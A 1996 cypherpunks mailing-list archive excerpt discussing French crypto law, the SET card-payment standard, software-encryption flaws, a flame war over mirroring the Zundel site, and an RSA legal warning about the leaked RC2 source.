Yahoo who can't afford to go down.

To drive my point home: suppose the owners of www.howtired.com
(yes, it does exist) were to hijack hotwired. Further suppose 
that they mirrored (or otherwise replicated) hotwired's content, 
displaying it to users with some nasty changes, and filtering
out all complaint mail. One assumes HotWired's admins are savvy
enough to think of this, but you never know, and if they took
a few days or more over fixing it, it would not be nice for them.
Of course, their lawyers wouldn't make it nice for howtired
either, if they had their address, and it wasn't in ... China!

Rishab




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cedric Ingrand" <cedric@isicom.fr>
Date: Thu, 1 Feb 1996 07:17:48 +0800
To: Kari Laine <buster@klaine.pp.fi>
Subject: Re: Crypto-smart-card startup Inside Technologies
Message-ID: <199601312256.XAA16802@s2.isicom.fr>
MIME-Version: 1.0
Content-Type: text/plain


> >There's an article in the January 29 _EE Times_ about a French
> >cryptographic-smart-card startup called Inside Technologies.
> >Tidbits:
> 
> I find it in a way amusing that a country which
> have very weird attitude towards use of crypto
> (it is not allowed to be used) tries to set 
> standards and provide new technology. If they
> are that opposing to use of strong encryption
> how on earth they can be providing it to others
> and get those others to believe there is no
> catch in it?

The use of encryption is in no way forbidden in France. It just has
to be approved beforehand, which up to recently amounted to pretty
much the same (-:. But, due to industry pressure, things are changing.
Netscape can now market its secure server in France, as well as the
export-version browser. I haven't heard of anyone having their PGP
approved yet though..

Best, Cedric.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Fri, 2 Feb 1996 00:01:19 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Flaw in Netscape rejoinder (was Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards)
In-Reply-To: <311088AC.2891@netscape.com>
Message-ID: <199602011518.HAA22905@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
>   I think that you may have to rethink some of your assumptions that
> were valid back when you designed the system, but are no longer given
> the current growth and changing demographics of the internet.

This is all getting unnecessarily complicated. As I pointed out
in another post ("FV's blatant double standards") NO SYSTEM FOR
SECURITY IS SAFE when one allows for recipient compromise, i.e. 
privileged access to a recipient's system by a malicious program.

>   I'd really like to see some effort spent on closing some of the more
> gaping holes in the underlying systems.  Why should it be so easy
> for one program to snoop on the keystrokes directed to another?

Easy or difficult is not the point. In DOS it's possible for any program,
in Unix only for those with root access. Security fails when it is
not possible to make a distinctionbetween a program that _should_ 
have access and one that _shouldn't_. Anyone who's tried to teach
novice DOS users what to do when one of those anti-virus TSR tools
complains that something is doing something it shouldn't will know
how hard it is for _users_ to guard themselves.

> Why should it be so easy for a program downloaded from the net
> to patch a part of the operating system?

I would think that most viruses are transmitted by floppy
disk, even now, or by programs _intentionally_ downloaded
and _intended_ to patch the OS (such as a screen blanker). 
The possibility of mass net-based creepy-crawlies has been
remote due to the uniquely multi-platform nature if Internet
protocols; they're Unix-based, but end-users have PCs. Only
metaplatforms such as Java, perlCCI, Telescript could change
this.

Rishab

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon L. Pope" <pope@auditnet.tamu.edu>
Date: Fri, 2 Feb 1996 09:15:37 +0800
To: cypherpunks@toad.com
Subject: unscribe
Message-ID: <170F31D140CE@AUDITNET.TAMU.EDU>
MIME-Version: 1.0
Content-Type: text/plain



unscribe cypherpunks@toad.com

TAMU-TAMU-TAMU-TAMU-TAMU-TAMU-TAMU-TAMU-TAMU

Jon L. Pope, CISA, CIA
Supervisory Internal Auditor
Texas A&M University
Mail Stop #1280         e-mail:  pope@auditnet.tamu.edu
College Station, Tx, 77843-1280
Phone: (409)845-1323  Fax: (409)845-6437)

TAMU-TAMU-TAMU-TAMU-TAMU-TAMU-TAMU-TAMU-TAMU




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Thu, 1 Feb 1996 05:49:29 +0800
To: cypherpunks@toad.com
Subject: Re: NOISE: Borenstein's Fatal Spam
In-Reply-To: <Pine.3.89.9601302323.A8042-0100000@wane3.scri.fsu.edu>
Message-ID: <pgpmoose.199602010813.60849@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


A number of people have written words to the
effect of:
  First Virtual, you lost a lot of ground with me.
  (sounds like others feel the same way, too).

I disagree. I think there is a big difference
between "knowing theoretically that X, Y and Z
are possible" and "look, I have a program that
does X, Y and Z in a certain order, and very
fast, and surprisingly successfully, and this has
major implications for the banking community".

I compare nsb's "meaning" as I understand it to
that of the paper out of Berkeley a few months
ago, which basically said "We've known for a long
time how IP snooping and replacement attacks could
theoretically succeed; here's a program that
inserts trojan horses while binaries flow across
the wire based on it." That was applauded as a
very meaningful result, even though the media
instantly picked up on it and blew it up.

I think most of the problem here is that we heard
about it in media words first, and in a reasoned
argument second. That's life. 

This is my first (and last) contribution to the
discussion. Sorry to add to the verbiage. I hope
FV and Nathaniel (as well as everyone else) keeps
working on things like this.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ponder@mail.irm.state.fl.us (pj ponder)
Date: Thu, 1 Feb 1996 22:04:30 +0800
To: cypherpunks@toad.com
Subject: Visa & MC Std
Message-ID: <199602011325.AA30614@mail.irm.state.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


just heard this on NPR Friday 
am on the east coast of NA.
http://www.nytimes.com/library/cyber/week/0201internet-safety.html



February 1, 1996

Group to Unveil Industry Standard for Electronic Payments
----------------------------------------------------------------------
Forum
Join a discussion on Computers and Society: On-Line Economics. 
----------------------------------------------------------------------

By JOHN MARKOFF
AN FRANCISCO -- Hoping to remove a major impediment to credit card  
transactions over the Internet, a business group led by Mastercard  
International 
and Visa International plans to announce an industry-standard technology  
Thursday for protecting the security of electronic payments. 

The new technical standard brings together previously warring camps --  
one led by the giant Microsoft Corp., the other by an Internet software  
upstart, Netscape 
Communications Corp. 

The standard, which industry executives expect to go into commercial use  
before the end of the year, is intended to give merchants of goods and  
services in 
cyberspace the convenience of a single, universally employed means for  
protecting the privacy of on-line credit card transactions. 

And for customers, the new technology promises a much higher level of  
security for electronic purchases than has previously been available on  
the Internet. 

The new approach "is more secure than the system in use in the physical  
world in which you give your card to a waiter in the restaurant," said  
Mark Greene, vice 
president for electronic payments for the Internet division of IBM,  
which is one of the companies endorsing the new standard. 

To the extent that the end of this technology face-off gives a lift to  
electronic commerce, Netscape can only benefit, since it is the provider  
of the leading 
software used for "browsing" the Internet's World Wide Web and for  
conducting on-line transactions on the Web. 

Netscape is already on a financial roll, announcing fourth-quarter  
revenue Wednesday that was nearly double the level of the previous  
quarter and profits that 
exceeded analysts' expectations. 

"This will make it a lot easier for consumers to buy and sell things  
electronically," said Taher Elgamal, chief scientist of Netscape. "We  
won't have to face the 
issue of competing standards." 

Netscape will be working to incorporate the new technology into its  
Navigator Web-browsing software. Microsoft, in turn, will be adding the  
technology to its 
Explorer software, which competes with Netscape's Web browser. 

The software standard, called Secure Electronic Transactions, or SET,  
will permit a user to send a credit card account numbers to a merchant  
in a scrambled 
form. 

The scrambled number is supposed to be unintelligible to electronic  
eavesdroppers and thieves -- and even to the merchants receiving the  
payment. 

But a special code is supposed to enable the merchant to check  
electronically and automatically with the bank that issued the credit  
card to make sure that it is a 
valid card number and that the customer is the authorized user of the  
card. The number-scrambling part of the system is based on a well-known  
and widely used 
national software standard known as the Data Encryption Standard. 

Besides being added to Netscape's and Microsoft's Web browser, the SET  
technology would need to be incorporated into Internet server computers  
-- the 
machines that function as storage terminals and gateways that individual  
users' computers interact with on the global computing network. 

Testing of SET will begin this spring, according to Dick Lonergan,  
executive vice president of Visa, who said that commercial service was  
expected to begin late 
this year. 

Currently, many powerful types of encryption technology are barred from  
export because the government fears that foreign enemies or terrorists  
may be able to 
conspire electronically. But the new credit card security standard will  
not be subject to such strictures, its developers said, because it is  
designed to protect only 
financial information -- not electronic messages or other types of  
computer documents. 

In addition to Mastercard, Visa, IBM, Microsoft and Netscape, the other  
big organizations endorsing the new SET standard include GTE Corp. and  
Science 
Applications International Corp., a technology and military consulting  
business. Two other backers include Terisa Systems Inc. and Verisign  
Inc., both Silicon 
Valley companies that have developed some of the underlying technology  
for the SET standard. 

Last September, Microsoft and Visa together proposed a security standard  
known as Secure Transaction Technology, which would have competed  
directly with 
a system being developed by a group led by Mastercard, IBM and Netscape. 

Shortly afterwards, however, Visa and Mastercard -- the two largest  
credit card associations -- said publicly that they would pursue a  
single standard to avoid 
forcing merchants and consumers to choose between competing  
technologies. 

"We took the best of both technologies," said Edward Hogan, senior vice  
president for electronic commerce at Mastercard International. "There  
was a blip in the 
road, but both associations realized that their memberships wanted a  
single standard."

Home | Sections | Contents | Search | Forums | Help

Copyright 1996 The New York Times Company 
----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 1 Feb 1996 22:01:26 +0800
To: rich@c2.org>
Subject: Re: Tim's paranoid rant about Declan appearing on "Europe's Most Wanted"
In-Reply-To: <199602011002.CAA25917@infinity.c2.org>
Message-ID: <gl4A=xu00YUr41Pol2@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 1-Feb-96 Tim's paranoid rant about
D.. by Just Rich@c2.org 
> I disagree. It is clear to me that there is absolutely no cloud hanging 
> over us. If any German court tried to press charges against me for 
> posting Zendel's materials, they'd be laughed across the Argonne. Most 
> mainstream Jewish groups *love* me right now.
>  
> I find it curious, and I am beginning to get a little annoyed, that my
> name is rarely mentioned, though I set up the first mirror, and Declan got
> the files from me. 

So you're getting pissy that you're not The Only Zundel Mirror. Big
fucking deal. Get over it. The more the better.

I find it telling that you wrote me mail demanding that I alter my web
pages to your satisfaction or you'll smear me in the press, since your
web site (you informed me) is going to be featured in the next issue of
TIME, Internet World, and the San Francisco Chronicle.

Hey, guy, kudos to you. Glad to hear it. Smear the fuck away.

> I am very annoyed that Declan has not responded to repeated requests to
> remove the cleartext "Stanford University" from the parts of his Web site
> that mention me. Of course the stanford.edu, or at least net 36.190, will
> remain in the URL, but there is no reason that the link text could not say
> "Rich Graves' mirror." First Declan sent me mail saying he would respect
> my wishes, but he didn't.

Let's get the facts right and ignore Rich's distortions. I wrote:

    "I'll honor your wishes and take your full name off."

I did *not* write that I'd take Stanford's name off the pages. I did
take your full name off, as I said I would.

The point of mentioning universities by name is to point out that to
restrict web access to a university site, Germany will have to cut of
*all* web access to that university. (Or at least to that hostname.)

(BTW, I did give you credit for supplying much of the Zundelschtuff:
  http://www.cs.cmu.edu/~declan/Not_By_Me_Not_My_Views/censorship.html)

>  Then a friend of mine reminded Declan of my
> request, and Declan responded with abuse. 

Your friend, Haggai Kupermintz, sent me unsolicited email demanding to
know why I didn't act on a request that was sent earlier that day. I
have better things to do than leap on every demand I get, so I flamed
him. *shrug* Big deal. I didn't know a rather mild flame was "abuse." If
you don't want to be "abused," don't send me demands in unsolicited
email. (I'm glad for the sake of other "abusers" at Stanford that your
school's speech code was struck down by a California court last year.)

> Declan wants me to believe that this disclaimer is enough:
>  
>        "Please note that the
>        existence of a web site at any particular institution does not
>        in any way imply endorsement. Universities and businesses
>        do not take responsibility for what their community members
>        or customers place online."
>  
> This is clearly untrue when the person in question is a staff member, as I
> am. Were I still a student, then I could more legitimately say that I'm a
> student at Stanford, and that I have the academic freedom to post whatever
> I want; but as someone who now merely works for a living at Stanford, I do
> whatever I want by the (very) good graces of my (very good) employer. 

I don't follow. In what way is that disclaimer untrue? You *do*
represent Stanford? The concept of academic freedom doesn't apply to
staff members? If that's true, you do have a point.

> > In Declan's case, I suspect France wants him for the Mitterand book and
>  
> France doesn't want anyone for the Mitterand book, which was not, in 
> fact, criminally banned. It was censured, not censored, in a civil trial. 
> Declan is distorting the facts to suit his ego as Mr. Anti-Censorship.

I've never claimed to be Mr. Anti-Censorship. I've been trying my best
to resist certain specific censorship attempts for the last few years,
and I've even met with some limited success. Does the ego good and all.

> I find this breast-beating hype embarrassing and dishonest, and I am 
> seriously beginning to regret giving the Zundel files to Declan. Had I 
> known what he was going to do with them, and how he was going to behave, I 
> would have retained closer control.

Oh, spare me. You posted to cypherpunks that the files were available
via AFS, so I snagged them. You didn't "give" them to me any more than I
"gave" people the Zundelhausenfiles if they FTP 'em from my account.

How can you "retain closer control" over files that are publicly
available on the web? You can make them more difficult to get, I
suppose, but I think that defeats the purpose and is a simply fascist
thing to do -- if the purpose is to make them available anyway.

Hell, your files were out-of-date, so I had to go back to the Zundelsite
anyway.

> One mirror site was enough. The German providers would not have blocked
> stanford.edu had it remained the only mirror site. The President of
> Stanford, Gerhard Casper, is a recognized constitutional scholar from
> Germany. The Stanford Provost, Condoleezza Rice, was one of the two or 
> three people most responsible for the Bush Administration's policy 
> towards German Unification. Dozens of Stanford students have studied in 
> Berlin.

One mirror site may have had a limited effect, but more mirror sites
have a more significant effect.

The press likes a local angle, and local mirrors are giving them just
that. I put a reporter from the Boston Globe in touch with the UMass
mirror operator, and a reporter from the Philadelphia Inquirer in touch
with the University of Pennyslvania mirror operator. I'd love to see
mirrors in every major city for greater coverage in every major paper.

If you don't understand that concept, you don't understand the way the
media works.

> Had they blocked stanford.edu, or had they gotten through to Stanford and 
> somehow gotten Stanford to force me to take down the pages, then we would 
> have set up more mirrors. I would have started, and maybe stopped, 
> by setting up mirrors on c2.org and netcom.com. Graduated response. 

As I've told you in email, I disagree. This is the first time a Western
government has tried to do something like this, and a strong (not a mild
or "graduated") response is necessary.

If there were just one mirror, I can see the German prosecutors cutting
off access to that one too. Sure, we can put up more and more, but if
the German government starts along the path of blocking sites
one-by-one, it may be difficult for them to back down, and we're faced
with a pitched battle. That's why a strong initial showing is necessary,
to demonstrate to them the futility of censoring the Internet.

So Rich, answer me this: "What articulable and demonstrable harm have
additional mirror sites done, besides hurt your ego?"

> This is ludicrous. I expect better from you.

I'm a big fan of Tim's, and I think that while he may have been jesting,
his comments have a serious undertone.

I don't really expect to be locked up for the rest of my life in a
German cellblock, but harassment at entry/exit points is possible.
Perhaps probable, given that other "distributors" of Neo-Nazi spew have
experienced just that.

> Ernst Zundel is a lying Nazi asshole who wants you to believe that there 
> is a Global Jewish Conspiracy to censor him. Fuck him.

Yep, exactly. The more you know about Mr. "UFOs in Antarctica," the
better you can do the job.

> Declan, if you don't fix up your page the way I want it by morning (please
> not that you have three more hours of morning than I do), I will post a
> modified (spell-checked) version of this note on my Web page, to
> alt.censorship, and to your "fight-censorship" mailing list.

Please send me in private email (or post it here if you really want)
exactly what you want me to change.

Rich, by now I suspect you've seen this joke, but what the hell:

   Q: What's a left-wing firing squad?

   A: Everyone stands in a circle and shoots at each other

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 1 Feb 1996 22:20:04 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Declan appearing on "Europe's Most Wanted"
In-Reply-To: <ad35b1f0060210043fc3@[205.199.118.202]>
Message-ID: <0l4AOdC00YUrE1PsVc@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 1-Feb-96 Declan appearing on
"Europe.. by Timothy C. May@got.net 
> The situation with Declan, Sameer, Duncan, and others, is even less clear.
> Things are moving much faster now that the Net is the means of
> distribution. I was of course half-joking about Declan visiting Europe, but
> surely France could decide to throw the book at him, and any EU country he
> entered (such as Ireland, judging from his name) could hold him at their
> entry point and ship him off to France to "set an example."

Tim, you really know how to scare a fellow with this Subject: line this
early in the morning!

My take on the situation, from cyberia and WELL discussions, is that if
a book is banned under French law, it may be difficult to sue for
copyright violations. (Intuitively, this sorta makes sense. If you are
*unable* to sell it, what damages are there?) Also, international law
would require that the copyright holder sue in my local U.S. court.

I have not heard from either the publisher or author, even though French
ISPs have linked to my page and it's been getting a decent amount of
traffic. Interestingly, almost all the comments I've received have been
positive -- only two negative responses, including one email bombing
attempt. I would be interested to know what the publisher and author's
perspectives are on this. Reports from France indicate that the
publisher, Plon, is *not* going to sue the guy who first put it online.

> In Declan's case, I suspect France wants him for the Mitterand book and
> Germany wants him for the Zundelsite mirrors. The lesser European countries
> will of course follow their leads.

I'm not too worried about France, but I'm having second thoughts about
Germany. Let's just say I'm not planning a vacation there anytime soon.
:)

> Seriously, Declan, I admire what you've done, but I hope you don't plan to
> leave the U.S. for Europe anytime soon.

Thanks, Tim. I haven't actually spoken to my attorney (the former head
of the local ACLU) about this, and perhaps I should have. *sigh* He'll
probably yell at me for getting involved in yet another controversy...

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Fri, 2 Feb 1996 01:39:54 +0800
To: cypherpunks@toad.com
Subject: VISA /MC Press release
Message-ID: <2.2.32.19960201171228.00ccae34@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain



10:20 PR Visa And Mastercard Combine Security Specifications For Card
Transactions On The Internet Into One Standard
Companies: X.MST X.VSA   Move Expected to Accelerate Development of
Electronic Commerce and  Bolster Consumer Confidence in the Security of
Cyberspace Transactions
  
   PURCHASE, N.Y. & SAN FRANCISCO, Feb. 1 /PRNewswire/ -- Addressing
consumer concerns about making purchases on the Internet, MasterCard
International and Visa International joined together today to announce a
technical standard for safeguarding payment card purchases made over open
networks such as the Internet.  Prior to this effort, Visa and MasterCard
were pursuing separate specifications.  The new specification, called Secure
Electronic Transactions (SET), represents the successful convergence of
those individual efforts.  A single standard means that consumers and
merchants will be able to conduct bankcard transactions in cyberspace as
securely and easily as they do in retail stores today. 
  The associations expect to publish SET on their World Wide Web sites in
mid-February.  Following a comment period, the joint specification is
scheduled to be ready for testing in the second quarter of 1996.  Visa and
MasterCard expect that banks will be able to offer secure bankcard services
via the Internet to their cardholders in the fourth quarter 1996. 
  Participants in this effort with MasterCard and Visa are:  GTE, IBM,
Microsoft, Netscape Communications Corp., SAIC, Terisa Systems and Verisign.
Also, SET will be based on specially developed encryption technology from
RSA Data Security. 
  "This is the first step in making cyberspace an attractive venture for
banks and merchants.  A single standard limits unnecessary costs and builds
the business case for doing business on the Internet," said Edmund Jensen,
president and CEO of Visa International.  "Further, our work with MasterCard
demonstrates our unwavering commitment to address the needs of our member
financial institutions and their merchants and cardholders." 
  H. Eugene Lockhart, CEO of MasterCard, said:  "MasterCard has viewed one
standard for secure card purchases on the Internet as a critical catalyst
for electronic commerce because it bolsters consumer confidence in the
security of the electronic marketplace.  A single standard has always been
our objective because it is in the best interests of not only consumers, but
also merchants and financial institutions worldwide. We are glad to work
with Visa and all of the technology partners to craft SET.  This action
means that consumers will be able to use their bankcards to conduct
transactions in cyberspace as securely and easily as they use cards in
retail stores today." 
  The card associations will separately test SET with consumers, merchants
and financial institutions.  A joint interoperability test will be conducted
after the individual tests to ensure SET, where necessary, operates as
smoothly as the point-of-sale system used today. Upon conclusion of the
tests, an updated version of the specification will be published for
software providers. 
  MasterCard's Web address is http://www.mastercard.com.  Visa's Web address
is http://www.visa.com. 
  MasterCard International Incorporated is a global payments company that
provides consumer credit, debit and other payment products in partnership
with 22,000 member financial institutions worldwide. MasterCard's family of
brands, MasterCard, Maestro and Cirrus, represent approximately 300 million
cards in circulation, and over 13 million acceptance locations, including
243,000 MasterCard/Cirrus ATMs worldwide.  MasterCard's pioneering work in
the areas of transaction processing and delivery systems continues to
revolutionize the way consumers pay for goods and services. 
  Headquartered in the San Francisco Bay Area, Visa is the world's largest
payment system.  It plays a pivotal role in developing and implementing new
technologies that benefit its 19,000 member financial institutions and their
cardholders, businesses, governments and the global economy.  Visa's 442
million cards are accepted by more than 12.2 million merchants worldwide.
Visa/PLUS is the largest global ATM network. 
  /CONTACT:  David Melancon of Visa International, 415-432-2427; or  Dorea
Smith of MasterCard International, 914-249-1421/  
10:00 EST

John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Feb 1996 23:16:34 +0800
To: cypherpunks@toad.com
Subject: Let a Thousand Zundsites Bloom
Message-ID: <2.2.32.19960201142442.006ee22c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure that Rich vs Declan is exciting but I have to agree with Declan
that the more Zundsites the merrier.

It rarely pays to be subtle with nation states.  They don't have good
information processing capabilities.  It helps to really hit them over the
head with things.  It also means more to the public if you can say "Sure the
Germans banned this site but we put up a dozen copies within a few hours."
It is this casual ability to defeat nation states that is the significance
of the net and should be emphasized.

DCF

"Few Generals have ever lost a battle because they brought too many troops."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 1 Feb 1996 23:18:57 +0800
To: cypherpunks@toad.com
Subject: Re: Tim's paranoid rant about Declan appearing on "Europe's Most
In-Reply-To: <Pine.SUN.3.91.960201085932.6953C-100000@panix.com>
Message-ID: <wl4Aw2m00YUrA1PyIO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from another mailing list. (Charles is a journalist/author...)

---------- Forwarded message begins here ----------

Date: Thu, 1 Feb 1996 09:11:19 -0500 (EST)
From: Charles Platt <cp@panix.com>
Subject: Out of Control

Rich Graves' suggestion that Declan is "out of control" is interesting.
Perhaps Rich merely meant that Declan made a mistake but the subtext
suggests that Declan should be in some sense marching in step, following a
consensus, obeying a policy. I don't like the smell of this. 

In my experience, having read MUCH literature from revisionists and from 
organizations such as Wiesenthal and ADL, it is IMPOSSIBLE for anyone to 
adopt an independent or middle path without raising the wrath of those 
on both sides of Jewish issues. 

I also suggest that public statements, especially from ADL/Wiesenthal,
cannot be taken at face value. For instance: 

> * The ADL is tracking racist sites, but the goal is to expose them and
>   educate the public.

Anyone who believes that this is the totality of ADL activities and 
intentions is simply unaware of the history of the ADL. I have personally 
witnessed an ADL representative trying to recruit hackers to paralyze a 
BBS where white-supremacist materials were stored. And this I think is 
just the tip of the iceberg.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 1 Feb 1996 23:12:51 +0800
To: cypherpunks@toad.com
Subject: Re: Visa & MC Std
Message-ID: <v01540b09ad367ceb54a3@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:25 AM 2/1/96, pj ponder wrote (much elided):

>AN FRANCISCO -- Hoping to remove a major impediment to credit card
>transactions over the Internet, a business group led by Mastercard
>International
>and Visa International plans to announce an industry-standard technology
>Thursday for protecting the security of electronic payments.
...
>
>The software standard, called Secure Electronic Transactions, or SET,
>will permit a user to send a credit card account numbers to a merchant
>in a scrambled
>form.
>
>The scrambled number is supposed to be unintelligible to electronic
>eavesdroppers and thieves -- and even to the merchants receiving the
>payment.
>
>But a special code is supposed to enable the merchant to check
>electronically and automatically with the bank that issued the credit
>card to make sure that it is a
>valid card number and that the customer is the authorized user of the
>card. The number-scrambling part of the system is based on a well-known
>and widely used
>national software standard known as the Data Encryption Standard.

----------------

A few psueudorandom points regarding this post:

        First, it seems silly to implement a separate standard that only
works for the credit card number.  What about the privacy of the rest of
the info (what I am ordering, how much, etc.).

        Can (or will) this be layered with Netscape's SSL?

        How is this to be implemented?  It sounds like the merchants will
just pass the encrypted number to the credit card company.  If this is the
case, key management could become an issue.  I suppose this could easily be
implemented using public key crypto, but only DES was mentioned.  If only
DES is used and everyone uses the same DES key, that would be a valuable
key to break!

        How about a MITM attack.  Get the encrypted credit card #, and
change the purchase amount, delivery info, etc if that is not encrypted.

If there is anyone on the list with more info on this, I would love to hear
it (heopfully we will hear something from Netscape, since they are quoted
in the article).  From what I know so far, it seems like a poor compromise.



---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sat, 3 Feb 1996 01:56:17 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE][CONTEST][FACTS] don't help much, do they?
In-Reply-To: <ad35484a000210046d7a@[205.199.118.202]>
Message-ID: <9602011536.AA06728@outland>
MIME-Version: 1.0
Content-Type: text/plain



> Ontogeny recapitulates phylogeny, as the saying goes.

> [ Mr. May laments the futility of []'d labeling to raise S/N. ]

	For those that use emacs (and you should :), there's a version
of GNUS (the newsreader) that has a neat scoring feature.  Unlike a kill
file which only gets rid of articles, scoring will automagically assign
a negative (i.e. kill it) or positive (i.e. interesting) score to articles.
You can manually rate articles or threads, or you can let Gnus use what
the author of the package calls "artificial stupidity" to assign points
based on whether or not you read a particular message.  I've been using
it on news for a couple of days now and it's starting to pickup some of
my reading habits.  It will also work on mail files (now if I can only
get MH installed where my mail feed comes in I'll be set :).  It also can
access shared global score files using anon-ftp, so if someone want's to
start a CP scoring service . . . .

	If you're interested check out:

http://www.ifi.uio.no/~larsi/

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 2 Feb 1996 03:27:26 +0800
To: cypherpunks@toad.com
Subject: The Boys From Brazil - thoughts on cloning Nazi servers
Message-ID: <Pine.SOL.3.91.960201103640.11241A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



I've tried to stay out of this thread, as it is mostly off topic, but I 
do have one suggestion to people setting up clones of the zundel site. 

There's a fine line between defending someones freedom of speech, and 
actively promoting that speech. The reason these mirrors have been set up 
is to counter the restriction on access to the original site that has 
been put in place by Deutche Telecom; however, in addition to defeating 
this restriction, this approach also makes the material more widely 
available than it was previously, which could be seen as crossing the 
line between defence of free speech, and active promotion. 

One approach that would stop this line being crossed would be to 
configure the clone servers to only allow access to sites in Germany 
affected by the original restriction. This compromise defends freedom of 
speech, but does not give the site any wider promulgation than it would 
have had had no government restrictions been emplaced.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PJ Ponder <pjp@wane-leon-mail.scri.fsu.edu>
Date: Fri, 2 Feb 1996 00:55:25 +0800
To: cypherpunks@toad.com
Subject: Visa and MC announce Thursday
Message-ID: <Pine.3.89.9602011010.A12396-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


sorry about screwing up the day of the week, 
today is really *Thursday*, not Friday.
 . . . first post of the day, & so forth.

My earlier message:
   From: ponder@mail.irm.state.fl.us (pj ponder)
   To: cypherpunks@toad.com
   Subject: Visa & MC Std 
   Sender: owner-cypherpunks@toad.com

   just heard this on NPR Friday 
                          ^^^^^^
   am on the east coast of NA.
   http://www.nytimes.com/library/cyber/week/0201internet-safety.html


   February 1, 1996

   Group to Unveil Industry Standard for Electronic Payments
   <the rest clipped>

p.s. went right out and bought the NY Times and the WSJ, but they
didn't have any more info than what is on the nytimes.com server.
[return to signal mode]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Fri, 2 Feb 1996 07:01:28 +0800
To: cypherpunks@toad.com
Subject: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <9601018232.AA823213189@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain



WARNING NOTICE

        It has recently come to the attention of RSA Data
Security, Inc. that certain of its confidential and
proprietary source code has been misappropriated and
disclosed.  Despite such unauthorized use and disclosure,
RSA Data Security reserves all intellectual property rights
in such source code under applicable law, including without
limitation trade secret and copyright protection.  In
particular, RSA Data Security's RC2 (TM) symmetric block
cipher source code has been illegally misappropriated and
published.  Please be advised that these acts, as well as
any retransmission or use of this source code, is a
violation of trade secret, copyright and various other state
and federal laws.  Any person or entity that acquires,
discloses or uses this information without authorization or
license to do so from RSA Data Security, Inc. is in
violation of such laws and subject to applicable criminal
and civil penalties, which may include monetary and punitive
damages, payment of RSA's attorneys fees and other equitable
relief.

        RSA Data Security considers misappropriation of its
intellectual property to be most serious.  Not only is this
act a violation of law, but its publication is yet another
abuse of the Internet.  RSA has begun an investigation and
will proceed with appropriate action against anyone found to
have violated its intellectual property rights.

        Anyone having information about the misappropriation
identified above is encouraged to contact RSA directly.





